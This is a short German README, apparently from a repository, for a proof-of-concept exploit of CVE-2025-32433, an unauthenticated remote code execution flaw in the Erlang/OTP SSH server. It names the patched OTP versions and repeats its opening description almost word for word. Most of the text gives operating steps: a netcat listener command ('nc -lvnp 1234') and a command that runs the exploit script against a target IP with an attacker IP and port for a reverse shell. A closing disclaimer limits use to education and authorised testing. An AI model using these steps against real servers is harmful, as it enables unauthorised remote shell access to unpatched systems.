
PoC, das eine nicht authentifizierte Remote-Codeausführung im Erlang/OTP SSH-Server zeigt. Durch Ausnutzung eines Fehlers in der SSH-Protokollnachrichtenverarbeitung kann ein Angreifer ohne gültige Anmeldeinformationen beliebige Befehle auf dem Ziel ausführen.
PoC, das nicht authentifizierte Remote-Codeausführung im Erlang/OTP SSH-Server zeigt.
Durch Ausnutzung eines Fehlers in der Nachrichtenverarbeitung des SSH-Protokolls kann ein Angreifer beliebige Befehle auf dem Ziel ausführen, ohne gültige Anmeldeinformationen zu besitzen.
Dieses Problem ist in OTP-27.3.3, OTP-26.2.5.11 und OTP-25.3.2.20 behoben.
Listener-Einrichtung:
nc -lvnp 1234
Exploit ausführen:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : Ziel-IP--rport : Ziel-SSH-Port--lhost : Ihre IP für die Reverse Shell--lport : Ihr Listener-Port

Dieses Repository dient ausschließlich zu Bildungszwecken. Verwenden Sie diesen Exploit nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Missbrauch kann illegal sein und ist strengstens untersagt.